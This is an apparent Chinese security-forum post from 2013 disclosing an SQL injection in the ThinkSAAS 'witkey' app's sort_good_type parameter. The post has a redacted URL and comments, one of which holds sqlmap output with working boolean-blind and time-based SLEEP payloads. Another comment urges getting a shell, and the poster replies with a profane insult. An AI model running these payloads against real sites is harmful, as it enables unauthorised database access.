thinksaas

2013-04-08 13:37:07 21 Rices 4449

http://xxxxxxxxxxxxx/index.php?app=witkey&ac=index&sort_industry=&sort_good_type=2[sql]

over

类别 Web安全

关于作者

Rices154篇文章2133篇回复

评论21次

要评论？请先登录或注册

21楼

hang333
2013-4-12 14:48

楼主试试看拿Shell～～

回复|@ta|踩(0)|顶(0)
20楼

a1258771
2013-4-9 19:47

撸主。。。求求求。。。。。。。。。

回复|@ta|踩(0)|顶(0)
19楼

xiaopeng
2013-4-9 19:22

楼主头像才是亮点，，哈哈

回复|@ta|踩(0)|顶(0)
18楼

biying
2013-4-9 15:47

回复|@ta|踩(0)|顶(0)
17楼

kimdle
2013-4-9 14:04

LZ好样的！！！

回复|@ta|踩(0)|顶(0)

16楼

Rank: 1

2013-4-9 11:16

sqlmap跑了下

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: sort_good_type     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND 7672=7672&sort_day=&sort_price=&sort_addtime=      Type: AND/OR time-based blind     Title: MySQL > 5.0.11 AND time-based blind     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND SLEEP(5)&sort_day=&sort_price=&sort_addtime= ---

回复|@ta|踩(0)|顶(0)

15楼

H4xssck3r
2013-4-9 09:26

简单明了，GOOD

回复|@ta|踩(0)|顶(0)
14楼

csser
2013-4-9 00:02

最直接的0day

回复|@ta|踩(0)|顶(0)
13楼

l14of
2013-4-8 23:58

这个App官网米有。

回复|@ta|踩(0)|顶(0)
12楼

xuehei
2013-4-8 23:00

rices ~~~大牛牛~~一直关注着你·~·

回复|@ta|踩(0)|顶(0)
11楼

XiaoMie
2013-4-8 22:02

文章简洁明了甚是喜欢

回复|@ta|踩(0)|顶(0)
10楼

0xcodede
2013-4-8 20:03

这个很干脆

回复|@ta|踩(0)|顶(0)
9楼

飞云小哥哥
2013-4-8 18:10

撸主v5

回复|@ta|踩(0)|顶(0)
8楼

M3loee
2013-4-8 17:24

呆b

回复|@ta|踩(0)|顶(0)
7楼

牧童
2013-4-8 15:59

嘿，Rices大牛发火了，后果很严重~~~~~~~

回复|@ta|踩(0)|顶(0)
6楼

爱绱hack
2013-4-8 15:49

撸过咯！　顶起

回复|@ta|踩(0)|顶(0)
5楼

nowake
2013-4-8 15:22

挖洞比赛。。。

回复|@ta|踩(0)|顶(0)
4楼

package
2013-4-8 14:38

你惹到 Rices牛了

回复|@ta|踩(0)|顶(0)
3楼

Rices
2013-4-8 14:23

艹你爹.

回复|@ta|踩(0)|顶(0)
2楼

M3loee
2013-4-8 14:22

撸主对wy一往情深有木有，都用来做头像了

回复|@ta|踩(0)|顶(0)

热门文章

渗透测试投稿文章：在cron中添加隐藏计划任务

## 原理`/etc/crontab`文件是系统级计划任务配置，几乎没有人修 ...

2025-05-14 14:56:40 13 22448

Web安全Discuz! 储型跨站脚本（XSS）漏洞

漏洞类型: 存储型XSSDiscuz ：需要启动日志模块（默认是关闭的 ...

2025-06-17 18:35:58 8 1183

安全资讯你的朋友被黑客入侵了，你会是下一个吗？

某个亲近的人，无论是朋友、亲戚还是同事，其宝贵的在线账户被盗 ...

2025-05-02 01:01:09 19 2769

安全资讯苹果隔空播放(AirPlay)协议存在可蠕虫的远程代码执行漏洞可批量感染大量设备

隔空播放 (AirPlay) 是苹果开发为自家设备开发的协议，借助该协 ...

2025-05-02 01:02:44 13 2714

渗透测试Java 安全 | Click1 链分析

Click1 链分析环境说明链路分析危险方法PropertyUtils::getValue ...

2025-05-06 11:55:20 7 1611

最新回复

感谢大哥分享

2025-07-03 13:15:16

还是爆破key

2025-07-03 13:14:41

感谢老哥分享

2025-07-03 13:14:09

全局搜索关键字

2025-07-03 13:12:54

讲的确实不错，方便的话可用提供源代码吗 ...

2025-07-03 12:38:34

精华推荐

渗透测试投稿文章：Docker安全-容器逃逸

## Docker是什么Docker 是一个开放源代码软件，是一个开放平台， ...

2025-02-10 15:41:37 7 177

渗透测试从边缘到核心：基于Shiro反序列化的企业级域森林渗透实录

### 前言师傅们，五一玩的开不开心？哈哈哈，本来这篇文章想着五 ...

2025-05-06 09:36:16 43 1237

渗透测试【庆新春】--->>验证码绕过及识别专题

又是一年来到，身在t00ls我感到很高兴。两年前搞采集时候学的东 ...

2017-01-08 09:02:57 83 2782

渗透测试深析基于元素剥离的多种html注入实现Attack以及浅析防范措施

============================================================ ...

2013-06-14 15:04:33 22 8974

渗透测试从 Shiro 底层源码看 Shiro 漏洞

# 从 Shiro 底层源码看 Shiro 漏洞## 前言Shiro 的漏洞已爆出很 ...

2024-12-06 19:09:06 5 2501

Top ↑